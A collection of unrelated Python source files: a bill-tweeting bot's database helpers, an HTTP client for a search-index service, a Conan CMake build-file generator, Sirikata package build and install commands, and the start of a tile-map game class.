query = 'select * from bills where isnull(short_url)'
args = ()
result = []
try:
result = self.query_fetchmany(query, args)
except Exception as e:
raise Exception(e)
return result
#-------------------------------------------------------------------------------------------------------------------------------------------------
def tuple_to_dict(self, t):
"""Converts a tuple to an appropriate dict."""
if not isinstance(t, tuple):
raise Exception('Input must be a tuple!')
keys = ['id',
'type',
'number',
'sponsor',
'title',
'full_url',
'short_url',
'introduced',
'updated',
'posted']
return dict(zip(keys, t))
#-------------------------------------------------------------------------------------------------------------------------------------------------
def get_table_size(self):
"""Calculates number of rows in the database table.
Returns:
0 by default. Otherwise, integer representing
number of rows in the table.
Raises:
Exception: Error in query execution.
"""
query = 'select count(*) from bills'
result = 0
try:
self.cursor.execute(query)
result = self.cursor.fetchone()[0]
except Error as e:
raise Exception(e)
return result
#-------------------------------------------------------------------------------------------------------------------------------------------------
def get_row_to_post(self):
"""Gets a row to be tweeted out.
Returns:
A tuple containing row data from the database table.
Raises:
Exception: Error in query execution.
"""
query = 'select * from bills where !isnull(short_url) and posted=0 order by introduced asc'
row = None
try:
self.cursor.execute(query)
row = self.cursor.fetchone()
except Error as e:
raise Exception(e)
return row
| |
import base64
import json
try:
from email.generator import _make_boundary as choose_boundary
except ImportError:
from mimetools import choose_boundary
import mimetypes
import os
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib.request import Request
from urllib.request import urlopen
except ImportError:
from urllib2 import Request
from urllib2 import urlopen
import zlib
ENDPOINT = None
KEY = None
class Scout(object):
def __init__(self, endpoint=ENDPOINT, key=KEY):
self.endpoint = endpoint.rstrip('/')
self.key = key
def get_full_url(self, url):
return self.endpoint + url
def get_raw(self, url, **kwargs):
headers = {'Content-Type': 'application/json'}
if self.key:
headers['key'] = self.key
if kwargs:
if '?' not in url:
url += '?'
url += urlencode(kwargs, True)
request = Request(self.get_full_url(url), headers=headers)
fh = urlopen(request)
return fh.read()
def get(self, url, **kwargs):
return json.loads(self.get_raw(url, **kwargs))
def post(self, url, data=None, files=None):
if files:
return self.post_files(url, data, files)
else:
return self.post_json(url, data)
def post_json(self, url, data=None):
headers = {'Content-Type': 'application/json'}
if self.key:
headers['key'] = self.key
data = json.dumps(data or {})
if not isinstance(data, bytes):
data = data.encode('utf-8')
request = Request(self.get_full_url(url), data=data, headers=headers)
return json.loads(urlopen(request).read().decode('utf8'))
def post_files(self, url, json_data, files=None):
if not files or not isinstance(files, dict):
raise ValueError('One or more files is required. Files should be '
'passed as a dictionary of filename: file-like-'
'object.')
boundary = choose_boundary()
form_files = []
for i, (filename, file_obj) in enumerate(files.items()):
try:
data = file_obj.read()
except AttributeError:
data = bytes(file_obj)
mimetype = mimetypes.guess_type(filename)[0]
form_files.append((
'file_%s' % i,
filename,
mimetype or 'application/octet-stream',
data))
part_boundary = '--' + boundary
parts = [
part_boundary,
'Content-Disposition: form-data; name="data"',
'',
json.dumps(json_data)]
for field_name, filename, mimetype, data in form_files:
parts.extend((
part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % (
field_name, filename),
'Content-Type: %s' % mimetype,
'',
data))
parts.append('--' + boundary + '--')
parts.append('')
headers = {'Content-Type': 'multipart/form-data; boundary=%s' %
boundary}
if self.key:
headers['key'] = self.key
data = '\r\n'.join(parts)
if not isinstance(data, bytes):
data = data.encode('utf-8')
request = Request(self.get_full_url(url), data=data, headers=headers)
return json.loads(urlopen(request).read())
def delete(self, url):
headers = {}
if self.key:
headers['key'] = self.key
request = Request(self.get_full_url(url), headers=headers)
request.get_method = lambda: 'DELETE'
fh = urlopen(request)
return json.loads(fh.read())
def get_indexes(self, **kwargs):
return self.get('/', **kwargs)['indexes']
def create_index(self, name):
return self.post('/', {'name': name})
def rename_index(self, old_name, new_name):
return self.post('/%s/' % old_name, {'name': new_name})
def delete_index(self, name):
return self.delete('/%s/' % name)
def get_index(self, name, **kwargs):
return self.get('/%s/' % name, **kwargs)
def get_documents(self, **kwargs):
return self.get('/documents/', **kwargs)
def create_document(self, content, indexes, identifier=None,
attachments=None, **metadata):
if not isinstance(indexes, (list, tuple)):
indexes = [indexes]
post_data = {
'content': content,
'identifier': identifier,
'indexes': indexes,
'metadata': metadata}
return self.post('/documents/', post_data, attachments)
def update_document(self, document_id=None, content=None, indexes=None,
metadata=None, identifier=None, attachments=None):
if not document_id and not identifier:
raise ValueError('`document_id` must be provided.')
data = {}
if content is not None:
data['content'] = content
if indexes is not None:
if not isinstance(indexes, (list, tuple)):
indexes = [indexes]
data['indexes'] = indexes
if metadata is not None:
data['metadata'] = metadata
if not data and not attachments:
raise ValueError('Nothing to update.')
return self.post('/documents/%s/' % document_id, data, attachments)
def delete_document(self, document_id=None):
if not document_id:
raise ValueError('`document_id` must be provided.')
return self.delete('/documents/%s/' % document_id)
def get_document(self, document_id=None):
if not document_id:
raise ValueError('`document_id` must be provided.')
return self.get('/documents/%s/' % document_id)
def attach_files(self, document_id, attachments):
return self.post_files('/documents/%s/attachments/' % document_id,
{}, attachments)
def detach_file(self, document_id, filename):
return self.delete('/documents/%s/attachments/%s/' %
(document_id, filename))
def update_file(self, document_id, filename, file_object):
return self.post_files('/documents/%s/attachments/%s/' %
(document_id, filename),
{}, {filename: file_object})
def get_attachments(self, document_id, **kwargs):
return self.get('/documents/%s/attachments/' % document_id, **kwargs)
def get_attachment(self, document_id, filename):
return self.get('/documents/%s/attachments/%s/' %
(document_id, filename))
def download_attachment(self, document_id, filename):
return self.get_raw('/documents/%s/attachments/%s/download/' %
(document_id, filename))
def search_attachments(self, **kwargs):
return self.get('/documents/attachments/', **kwargs)
class SearchProvider(object):
def content(self, obj):
raise NotImplementedError
def identifier(self, obj):
raise NotImplementedError
def metadata(self, obj):
raise NotImplementedError
class SearchSite(object):
def __init__(self, client, index):
self.client = client
self.index = index
self.registry = {}
def register(self, model_class, search_provider):
self.registry.setdefault(model_class, [])
self.registry[model_class].append(search_provider())
def unregister(self, model_class, search_provider=None):
if search_provider is None:
self.registry.pop(model_class, None)
elif model_class in self.registry:
self.registry[model_class] = [
sp for sp in self.registry[model_class]
if not isinstance(sp, search_provider)]
def store(self, obj):
if type(obj) not in self.registry:
return False
for provider in self.registry[type(obj)]:
content = provider.content(obj)
try:
metadata = provider.metadata(obj)
except NotImplementedError:
metadata = {}
try:
identifier = provider.identifier(obj)
except NotImplementedError:
pass
else:
metadata['identifier'] = identifier
self.client.create_document(content, self.index, **metadata)
return True
def remove(self, obj):
if type(obj) not in self.registry:
return False
for provider in self.registry[type(obj)]:
self.client.delete_document(provider.identifier(obj))
return True
| |
from conans.model import Generator
from conans.paths import BUILD_INFO_CMAKE
class DepsCppCmake(object):
def __init__(self, deps_cpp_info):
self.include_paths = "\n\t\t\t".join('"%s"' % p.replace("\\", "/")
for p in deps_cpp_info.include_paths)
self.lib_paths = "\n\t\t\t".join('"%s"' % p.replace("\\", "/")
for p in deps_cpp_info.lib_paths)
self.libs = " ".join(deps_cpp_info.libs)
self.defines = "\n\t\t\t".join("-D%s" % d for d in deps_cpp_info.defines)
self.compile_definitions = "\n\t\t\t".join(deps_cpp_info.defines)
self.cppflags = " ".join(deps_cpp_info.cppflags)
self.cflags = " ".join(deps_cpp_info.cflags)
self.sharedlinkflags = " ".join(deps_cpp_info.sharedlinkflags)
self.exelinkflags = " ".join(deps_cpp_info.exelinkflags)
self.bin_paths = "\n\t\t\t".join('"%s"' % p.replace("\\", "/")
for p in deps_cpp_info.bin_paths)
self.rootpath = '"%s"' % deps_cpp_info.rootpath.replace("\\", "/")
class CMakeGenerator(Generator):
@property
def filename(self):
return BUILD_INFO_CMAKE
@property
def content(self):
sections = []
# DEPS VARIABLES
template_dep = ('set(CONAN_{dep}_ROOT {deps.rootpath})\n'
'set(CONAN_INCLUDE_DIRS_{dep} {deps.include_paths})\n'
'set(CONAN_LIB_DIRS_{dep} {deps.lib_paths})\n'
'set(CONAN_BIN_DIRS_{dep} {deps.bin_paths})\n'
'set(CONAN_LIBS_{dep} {deps.libs})\n'
'set(CONAN_DEFINES_{dep} {deps.defines})\n'
'# COMPILE_DEFINITIONS are equal to CONAN_DEFINES without -D, for targets\n'
'set(CONAN_COMPILE_DEFINITIONS_{dep} {deps.compile_definitions})\n'
'set(CONAN_CXX_FLAGS_{dep} "{deps.cppflags}")\n'
'set(CONAN_SHARED_LINKER_FLAGS_{dep} "{deps.sharedlinkflags}")\n'
'set(CONAN_EXE_LINKER_FLAGS_{dep} "{deps.exelinkflags}")\n'
'set(CONAN_C_FLAGS_{dep} "{deps.cflags}")\n')
for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
deps = DepsCppCmake(dep_cpp_info)
dep_flags = template_dep.format(dep=dep_name.upper(), deps=deps)
sections.append(dep_flags)
# GENERAL VARIABLES
deps = DepsCppCmake(self.deps_build_info)
template = ('set(CONAN_PACKAGE_NAME {name})\n'
'set(CONAN_PACKAGE_VERSION {version})\n'
'set(CONAN_DEPENDENCIES {dependencies})\n'
'set(CONAN_INCLUDE_DIRS {deps.include_paths} ${{CONAN_INCLUDE_DIRS}})\n'
'set(CONAN_LIB_DIRS {deps.lib_paths} ${{CONAN_LIB_DIRS}})\n'
'set(CONAN_BIN_DIRS {deps.bin_paths} ${{CONAN_BIN_DIRS}})\n'
'set(CONAN_LIBS {deps.libs} ${{CONAN_LIBS}})\n'
'set(CONAN_DEFINES {deps.defines} ${{CONAN_DEFINES}})\n'
'set(CONAN_CXX_FLAGS "{deps.cppflags} ${{CONAN_CXX_FLAGS}}")\n'
'set(CONAN_SHARED_LINKER_FLAGS "{deps.sharedlinkflags} ${{CONAN_SHARED_LINKER_FLAGS}}")\n'
'set(CONAN_EXE_LINKER_FLAGS "{deps.exelinkflags} ${{CONAN_EXE_LINKER_FLAGS}}")\n'
'set(CONAN_C_FLAGS "{deps.cflags} ${{CONAN_C_FLAGS}}")\n'
'set(CONAN_CMAKE_MODULE_PATH {module_paths} ${{CONAN_CMAKE_MODULE_PATH}})')
rootpaths = [DepsCppCmake(dep_cpp_info).rootpath for _, dep_cpp_info
in self.deps_build_info.dependencies]
module_paths = " ".join(rootpaths)
all_flags = template.format(deps=deps, module_paths=module_paths,
dependencies=" ".join(self.deps_build_info.deps),
name=self.conanfile.name, version=self.conanfile.version)
sections.append("\n### Definition of global aggregated variables ###\n")
sections.append(all_flags)
# TARGETS
template = """
foreach(_LIBRARY_NAME ${{CONAN_LIBS_{uname}}})
unset(FOUND_LIBRARY CACHE)
find_library(FOUND_LIBRARY NAME ${{_LIBRARY_NAME}} PATHS ${{CONAN_LIB_DIRS_{uname}}} NO_DEFAULT_PATH)
if(FOUND_LIBRARY)
set(CONAN_FULLPATH_LIBS_{uname} ${{CONAN_FULLPATH_LIBS_{uname}}} ${{FOUND_LIBRARY}})
else()
message(STATUS "Library ${{_LIBRARY_NAME}} not found in package, might be system one")
set(CONAN_FULLPATH_LIBS_{uname} ${{CONAN_FULLPATH_LIBS_{uname}}} ${{_LIBRARY_NAME}})
endif()
endforeach()
add_library({name} INTERFACE IMPORTED)
set_property(TARGET {name} PROPERTY INTERFACE_LINK_LIBRARIES ${{CONAN_FULLPATH_LIBS_{uname}}} {deps})
set_property(TARGET {name} PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${{CONAN_INCLUDE_DIRS_{uname}}})
set_property(TARGET {name} PROPERTY INTERFACE_COMPILE_DEFINITIONS ${{CONAN_COMPILE_DEFINITIONS_{uname}}})
set_property(TARGET {name} PROPERTY INTERFACE_COMPILE_OPTIONS ${{CONAN_CFLAGS_{uname}}} ${{CONAN_CXX_FLAGS_{uname}}})
set_property(TARGET {name} PROPERTY INTERFACE_LINK_FLAGS ${{CONAN_SHARED_LINKER_FLAGS_{uname}}} ${{CONAN_EXE_LINKER_FLAGS_{uname}}})
"""
existing_deps = self.deps_build_info.deps
sections.append("\n### Definition of macros and functions ###\n")
sections.append('macro(conan_define_targets)\n'
' if(${CMAKE_VERSION} VERSION_LESS "3.1.2")\n'
' message(FATAL_ERROR "TARGETS not supported by your CMake version!")\n'
' endif() # CMAKE > 3.x\n')
for dep_name, dep_info in self.deps_build_info.dependencies:
use_deps = ["CONAN_PKG::%s" % d for d in dep_info.deps if d in existing_deps]
deps = "" if not use_deps else " ".join(use_deps)
sections.append(template.format(name="CONAN_PKG::%s" % dep_name, deps=deps,
uname=dep_name.upper()))
sections.append('endmacro()\n')
# MACROS
sections.append(self._aux_cmake_test_setup())
return "\n".join(sections)
def _aux_cmake_test_setup(self):
return """macro(conan_basic_setup)
conan_check_compiler()
conan_output_dirs_setup()
conan_set_find_library_paths()
if(NOT "${ARGV0}" STREQUAL "TARGETS")
message(STATUS "Conan: Using cmake global configuration")
conan_global_flags()
else()
message(STATUS "Conan: Using cmake targets configuration")
conan_define_targets()
endif()
conan_set_rpath()
conan_set_vs_runtime()
conan_set_libcxx()
conan_set_find_paths()
endmacro()
macro(conan_set_find_paths)
# CMake can find findXXX.cmake files in the root of packages
set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
# Make find_package() to work
set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()
macro(conan_set_find_library_paths)
# For find_library
set(CMAKE_INCLUDE_PATH ${CONAN_INCLUDE_DIRS} ${CMAKE_INCLUDE_PATH})
set(CMAKE_LIBRARY_PATH ${CONAN_LIB_DIRS} ${CMAKE_LIBRARY_PATH})
endmacro()
macro(conan_set_vs_runtime)
if(CONAN_LINK_RUNTIME)
if(DEFINED CMAKE_CXX_FLAGS_RELEASE)
string(REPLACE "/MD" ${CONAN_LINK_RUNTIME} CMAKE_CXX_FLAGS_RELEASE ${CMAKE_CXX_FLAGS_RELEASE})
endif()
if(DEFINED CMAKE_CXX_FLAGS_DEBUG)
string(REPLACE "/MDd" ${CONAN_LINK_RUNTIME} CMAKE_CXX_FLAGS_DEBUG ${CMAKE_CXX_FLAGS_DEBUG})
endif()
if(DEFINED CMAKE_C_FLAGS_RELEASE)
string(REPLACE "/MD" ${CONAN_LINK_RUNTIME} CMAKE_C_FLAGS_RELEASE ${CMAKE_C_FLAGS_RELEASE})
endif()
if(DEFINED CMAKE_C_FLAGS_DEBUG)
string(REPLACE "/MDd" ${CONAN_LINK_RUNTIME} CMAKE_C_FLAGS_DEBUG ${CMAKE_C_FLAGS_DEBUG})
endif()
endif()
endmacro()
macro(conan_set_libcxx)
if(DEFINED CONAN_LIBCXX)
message(STATUS "Conan C++ stdlib: ${CONAN_LIBCXX}")
if(CONAN_COMPILER STREQUAL "clang" OR CONAN_COMPILER STREQUAL "apple-clang")
if(CONAN_LIBCXX STREQUAL "libstdc++" OR CONAN_LIBCXX STREQUAL "libstdc++11" )
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -stdlib=libstdc++")
elseif(CONAN_LIBCXX STREQUAL "libc++")
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -stdlib=libc++")
endif()
endif()
if(CONAN_LIBCXX STREQUAL "libstdc++11")
add_definitions(-D_GLIBCXX_USE_CXX11_ABI=1)
elseif(CONAN_LIBCXX STREQUAL "libstdc++")
add_definitions(-D_GLIBCXX_USE_CXX11_ABI=0)
endif()
endif()
endmacro()
macro(conan_set_rpath)
if(APPLE)
# https://cmake.org/Wiki/CMake_RPATH_handling
# CONAN GUIDE: All generated libraries should have the id and dependencies to other
# dylibs without path, just the name, EX:
# libMyLib1.dylib:
# libMyLib1.dylib (compatibility version 0.0.0, current version 0.0.0)
# libMyLib0.dylib (compatibility version 0.0.0, current version 0.0.0)
# /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.0.0)
# /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1197.1.1)
set(CMAKE_SKIP_RPATH 1) # AVOID RPATH FOR *.dylib, ALL LIBS BETWEEN THEM AND THE EXE
# SHOULD BE ON THE LINKER RESOLVER PATH (./ IS ONE OF THEM)
endif()
endmacro()
macro(conan_global_flags)
if(CONAN_SYSTEM_INCLUDES)
include_directories(SYSTEM ${CONAN_INCLUDE_DIRS})
else()
include_directories(${CONAN_INCLUDE_DIRS})
endif()
link_directories(${CONAN_LIB_DIRS})
add_definitions(${CONAN_DEFINES})
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${CONAN_CXX_FLAGS}")
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${CONAN_C_FLAGS}")
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ${CONAN_SHARED_LINKER_FLAGS}")
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${CONAN_EXE_LINKER_FLAGS}")
endmacro()
macro(conan_flags_setup)
# Macro maintained for backwards compatibility
conan_set_find_library_paths()
conan_global_flags()
conan_set_rpath()
conan_set_vs_runtime()
conan_set_libcxx()
endmacro()
macro(conan_output_dirs_setup)
set(CMAKE_RUNTIME_OUTPUT_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/bin)
set(CMAKE_RUNTIME_OUTPUT_DIRECTORY_RELEASE ${CMAKE_RUNTIME_OUTPUT_DIRECTORY})
set(CMAKE_RUNTIME_OUTPUT_DIRECTORY_DEBUG ${CMAKE_RUNTIME_OUTPUT_DIRECTORY})
set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/lib)
set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY_RELEASE ${CMAKE_ARCHIVE_OUTPUT_DIRECTORY})
set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY_DEBUG ${CMAKE_ARCHIVE_OUTPUT_DIRECTORY})
endmacro()
macro(conan_split_version VERSION_STRING MAJOR MINOR)
#make a list from the version string
string(REPLACE "." ";" VERSION_LIST ${${VERSION_STRING}})
#write output values
list(GET VERSION_LIST 0 ${MAJOR})
list(GET VERSION_LIST 1 ${MINOR})
endmacro()
macro(conan_error_compiler_version)
message(FATAL_ERROR "Incorrect '${CONAN_COMPILER}' version 'compiler.version=${CONAN_COMPILER_VERSION}'"
" is not the one detected by CMake: '${CMAKE_CXX_COMPILER_ID}=" ${VERSION_MAJOR}.${VERSION_MINOR}')
endmacro()
set(_CONAN_CURRENT_DIR ${CMAKE_CURRENT_LIST_DIR})
function(conan_get_compiler CONAN_INFO_COMPILER CONAN_INFO_COMPILER_VERSION)
MESSAGE(STATUS "Current conanbuildinfo.cmake directory: " ${_CONAN_CURRENT_DIR})
if(NOT EXISTS ${_CONAN_CURRENT_DIR}/conaninfo.txt)
message(STATUS "WARN: conaninfo.txt not found")
return()
endif()
file (READ "${_CONAN_CURRENT_DIR}/conaninfo.txt" CONANINFO)
string(REGEX MATCH "compiler=([A-Za-z0-9_ ]+)" _MATCHED ${CONANINFO})
if(DEFINED CMAKE_MATCH_1)
string(STRIP ${CMAKE_MATCH_1} _CONAN_INFO_COMPILER)
set(${CONAN_INFO_COMPILER} ${_CONAN_INFO_COMPILER} PARENT_SCOPE)
endif()
string(REGEX MATCH "compiler.version=([-A-Za-z0-9_.]+)" _MATCHED ${CONANINFO})
if(DEFINED CMAKE_MATCH_1)
string(STRIP ${CMAKE_MATCH_1} _CONAN_INFO_COMPILER_VERSION)
set(${CONAN_INFO_COMPILER_VERSION} ${_CONAN_INFO_COMPILER_VERSION} PARENT_SCOPE)
endif()
endfunction()
function(check_compiler_version)
CONAN_SPLIT_VERSION(CMAKE_CXX_COMPILER_VERSION VERSION_MAJOR VERSION_MINOR)
if(CMAKE_CXX_COMPILER_ID MATCHES MSVC)
# https://cmake.org/cmake/help/v3.2/variable/MSVC_VERSION.html
if( (CONAN_COMPILER_VERSION STREQUAL "14" AND NOT VERSION_MAJOR STREQUAL "19") OR
(CONAN_COMPILER_VERSION STREQUAL "12" AND NOT VERSION_MAJOR STREQUAL "18") OR
(CONAN_COMPILER_VERSION STREQUAL "11" AND NOT VERSION_MAJOR STREQUAL "17") OR
(CONAN_COMPILER_VERSION STREQUAL "10" AND NOT VERSION_MAJOR STREQUAL "16") OR
(CONAN_COMPILER_VERSION STREQUAL "9" AND NOT VERSION_MAJOR STREQUAL "15") OR
(CONAN_COMPILER_VERSION STREQUAL "8" AND NOT VERSION_MAJOR STREQUAL "14") OR
(CONAN_COMPILER_VERSION STREQUAL "7" AND NOT VERSION_MAJOR STREQUAL "13") OR
(CONAN_COMPILER_VERSION STREQUAL "6" AND NOT VERSION_MAJOR STREQUAL "12") )
conan_error_compiler_version()
endif()
elseif(CONAN_COMPILER STREQUAL "gcc" OR CONAN_COMPILER MATCHES "clang")
if(NOT ${VERSION_MAJOR}.${VERSION_MINOR} VERSION_EQUAL CONAN_COMPILER_VERSION)
conan_error_compiler_version()
endif()
else()
message("Skipping version checking of not detected compiler...")
endif()
endfunction()
function(conan_check_compiler)
if(NOT DEFINED CMAKE_CXX_COMPILER_ID)
if(DEFINED CMAKE_C_COMPILER_ID)
message(STATUS "This project seems to be plain C, using '${CMAKE_C_COMPILER_ID}' compiler")
set(CMAKE_CXX_COMPILER_ID ${CMAKE_C_COMPILER_ID})
set(CMAKE_CXX_COMPILER_VERSION ${CMAKE_C_COMPILER_VERSION})
else()
message(FATAL_ERROR "This project seems to be plain C, but no compiler defined")
endif()
endif()
if(CONAN_DISABLE_CHECK_COMPILER)
message(STATUS "WARN: Disabled conan compiler checks")
return()
endif()
if(NOT DEFINED CONAN_COMPILER)
conan_get_compiler(CONAN_COMPILER CONAN_COMPILER_VERSION)
if(NOT DEFINED CONAN_COMPILER)
message(STATUS "WARN: CONAN_COMPILER variable not set, please make sure yourself that "
"your compiler and version matches your declared settings")
return()
endif()
endif()
if( (CONAN_COMPILER STREQUAL "Visual Studio" AND NOT CMAKE_CXX_COMPILER_ID MATCHES MSVC) OR
(CONAN_COMPILER STREQUAL "gcc" AND NOT CMAKE_CXX_COMPILER_ID MATCHES "GNU") OR
(CONAN_COMPILER STREQUAL "apple-clang" AND (NOT APPLE OR NOT CMAKE_CXX_COMPILER_ID MATCHES "Clang")) OR
(CONAN_COMPILER STREQUAL "clang" AND NOT CMAKE_CXX_COMPILER_ID MATCHES "Clang") )
message(FATAL_ERROR "Incorrect '${CONAN_COMPILER}', is not the one detected by CMake: '${CMAKE_CXX_COMPILER_ID}'")
endif()
if(NOT DEFINED CONAN_COMPILER_VERSION)
message(STATUS "WARN: CONAN_COMPILER_VERSION variable not set, please make sure yourself "
"that your compiler version matches your declared settings")
return()
endif()
check_compiler_version()
endfunction()
"""
| |
import util
import packageconfig
import os
import subprocess, tempfile
import datetime
import shutil
# Package utilities
def packages_path(*args):
'''
Get path to the packages directory.
'''
return util.data_path('packages')
def package_path(package, *args):
'''
Get path to a package data directory or file.
'''
return util.data_path('packages', package, *args)
def package_load_config(package):
"""
Load the configuration for the given package
"""
return util.load_config(packageconfig, 'packages', package)
def install_dir(packname):
return package_path(packname, packageconfig.install_dir_name)
# Package commands
def command_package_init(*args):
"""
admin package init package_name
Initialize a new package of Sirikata. Packages are a build of
Sirikata you might want to execute multiple services from. This
command sets up the basic directory structure for a package,
including a customizable configuration file which you probably
want to edit after running this command.
"""
if len(args) == 0:
print 'No package name specified'
return 1
packname = args[0]
# Setup build, install, and data directories
util.ensure_dir_exists(package_path(packname))
# Touch an empty config.py where the user can adjust settings
config_py_file = open(package_path(packname, 'config.py'), 'w')
config_py_file.close()
return 0
def command_package_ls(*args):
"""
admin package ls
List packages found in this deployments data directory. Includes a
* if they appear to be properly built/installed.
"""
# Setup build, install, and data directories
package_dirs = os.listdir(packages_path())
for packname in package_dirs:
# Filter to directories with config files
if not os.path.isdir(package_path(packname)): continue
if not package_load_config(packname): continue
# Check for installation
installed_flag = ''
installdir = install_dir(packname)
bindir = os.path.join(installdir, 'bin')
# This is just a very basic sanity check for binaries we
# require
binfiles = (os.path.exists(bindir) and os.listdir(bindir)) or []
if ( ('space' in binfiles or 'space_d' in binfiles) and
('cppoh' in binfiles or 'cppoh_d' in binfiles) ):
installed_flag = '*'
print packname, installed_flag
return 0
def command_package_build(*args):
"""
admin package build deployment_name
Build the given deployment, generating the installed
version. Unless the deployment is bare, this doesn't do anything
to update the code or dependencies.
"""
if len(args) == 0:
print 'No package name specified'
return 1
packname = args[0]
package_load_config(packname)
builddir = package_path(packname, packageconfig.build_dir_name)
depsdir = os.path.join(builddir, 'dependencies')
buildcmakedir = os.path.join(builddir, 'build', 'cmake')
installdir = install_dir(packname)
try:
# If nothing is there yet, do checkout and build
# dependencies. Otherwise, just make sure our repo is fully
# up-to-date.
if not os.path.exists(package_path(packname, packageconfig.build_dir_name, '.git')):
subprocess.check_call(['git', 'clone', packageconfig.repository, package_path(packname, packageconfig.build_dir_name)])
else:
subprocess.check_call(['git', 'fetch', 'origin'], cwd=builddir)
# Make sure we're on the requested branch
subprocess.check_call(['git', 'checkout', packageconfig.version], cwd=builddir)
# We always need to make sure deps are up to date, either for
# a fresh checkout or because we may have switched
# branches/versions. This includes making sure the submodules
# are up to date.
subprocess.check_call(['make', 'update-dependencies'], cwd=builddir)
subprocess.check_call(['make'] + packageconfig.dependencies_targets, cwd=depsdir)
# We need to select whether to use cmake with tools (ccache),
# or just bare cmake. Using ccache in some setups can be
# counterproductive, and if we add support for things like
# distcc/icecream, we'll probably want to filter in some other
# conditions. These are heuristics for choosing whether or not
# to use ccache.
cmake_cmd = './cmake_with_tools.sh'
if 'nfs' in subprocess.Popen(['mount'], stdout=subprocess.PIPE).communicate()[0].split():
cmake_cmd = 'cmake'
# Normal build process, making sure we clean out any previous config
subprocess.check_call(['rm', '-f', 'CMakeCache.txt'], cwd=buildcmakedir)
subprocess.check_call([cmake_cmd,
'-DCMAKE_INSTALL_PREFIX='+installdir,
'-DCMAKE_BUILD_TYPE='+packageconfig.build_type]
+ packageconfig.additional_cmake_args + ['.'],
cwd=buildcmakedir)
subprocess.check_call(['make'] + packageconfig.additional_make_args, cwd=buildcmakedir)
subprocess.check_call(['make', 'install'] + packageconfig.additional_make_args, cwd=buildcmakedir)
except subprocess.CalledProcessError:
return 1
return 0
def command_package_install(*args):
"""
admin package install deployment_name url
Install a prebuilt version of Sirikata locally (as opposed to
building and installing locally.
"""
if len(args) == 0:
print 'No package name specified'
return 1
packname = args[0]
package_load_config(packname)
if len(args) < 2:
print "Must specify a URL to install from"
return 1
binary_url = args[1]
depdir = package_path(packname)
installdir = package_path(packname, packageconfig.install_dir_name)
tempdir = os.path.join(tempfile.gettempdir(), 'sirikata-deploy-' + str(datetime.datetime.now().time()))
os.mkdir(tempdir)
try:
subprocess.check_call(['curl', '-O', binary_url], cwd=tempdir)
fname = binary_url.rsplit('/', 1)[1]
if fname.endswith('tar.gz') or fname.endswith('tgz'):
subprocess.check_call(['tar', '-xzvf', fname], cwd=tempdir)
elif fname.endswith('tar.bz2'):
subprocess.check_call(['tar', '-xjvf', fname], cwd=tempdir)
elif fname.endswith('zip'):
subprocess.check_call(['unzip', fname], cwd=tempdir)
else:
print "Don't know how to extract file", fname
return 1
# Figure out where the actual install is since archives
# frequently have a layer of extra directories
curdir = tempdir
while True:
subdirs = [x for x in os.listdir(curdir) if os.path.isdir(os.path.join(curdir, x))]
if 'bin' in subdirs:
break
assert(len(subdirs) == 1)
curdir = os.path.join(curdir, subdirs[0])
# Now swap the directory we found into place
if os.path.exists(installdir): shutil.rmtree(installdir)
shutil.move(curdir, installdir)
# Cleanup
shutil.rmtree(tempdir)
except subprocess.CalledProcessError:
return 1
return 0
def command_package_destroy(*args):
"""
admin package destroy package_name
Destroy a package, i.e. remove all its contents from the filesystem.
"""
if len(args) == 0:
print 'No package name specified'
return 1
packname = args[0]
package_load_config(packname)
packdir = package_path(packname)
if not os.path.exists(packdir):
return 1
shutil.rmtree(packdir)
return 0
| |
from FieldPos import *
from NPC import *
import random
class Field:
def __init__(self,sizex,sizey,plr,ztype):
self.vil=plr
self.ztype = ztype
self.sizex = sizex
self.sizey = sizey
self.monsters = []
self.npcs = []
self.vilposes=[]
#creating and filling storage for field points
self.storage=[]
self.walkable=['1','2','4','5','6','7','9','10','2_1','13']
for i in range(0,sizex):
tmp=[]
self.storage.append(tmp)
for j in range(0,sizey):
self.storage[i].append(FieldPos(i,j,'1'))
random.seed()
if(self.vil==1):
self.make_vil()
if(self.vil==2 and self.ztype==1):
self.make_smallvil()
self.make_zone(ztype)
self.clear_paths(ztype)
self.set_player_start()
#self.print_task('player')
def make_smallvil(self):
qpos = random.randint(1,2)
if(qpos==1):
nwpos=(1,2)
elif(qpos==2):
nwpos=(7,2)
for i in range(0,2):
for j in range(0,2):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('1')
self.vilposes.append((i+nwpos[0],j+nwpos[1]))
self.storage[nwpos[0]+1][nwpos[1]].set_terrain('3_h_w')
self.storage[nwpos[0]][nwpos[1]].set_terrain('3_h_s')
npc = NPC((nwpos[0],nwpos[1]+1),str(random.randint(2,3)))
self.add_npc(npc)
def make_vil(self):
sx=self.sizex
sy=self.sizey
nwpos=(2,2)
for i in range(0,6):
for j in range(0,6):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('1')
self.vilposes.append((i+nwpos[0],j+nwpos[1]))
for i in range(3,5):
for j in range(0,2):
if(i==3):
if(j==0):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_1')
elif(j==1):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_4')
if(i==4):
if(j==0):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_2')
elif(j==1):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_3')
